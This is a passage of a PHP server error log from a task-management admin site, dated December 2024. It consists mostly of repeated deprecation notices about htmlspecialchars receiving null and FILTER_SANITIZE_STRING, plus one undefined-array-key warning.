12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:17:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:17:59 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:08 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:21:09 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:21:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:22:09 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:23:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:23:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:31:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:31:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:32:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:31:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 16:32:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:33:30 Australia/Sydney] PHP Deprecated: Constant 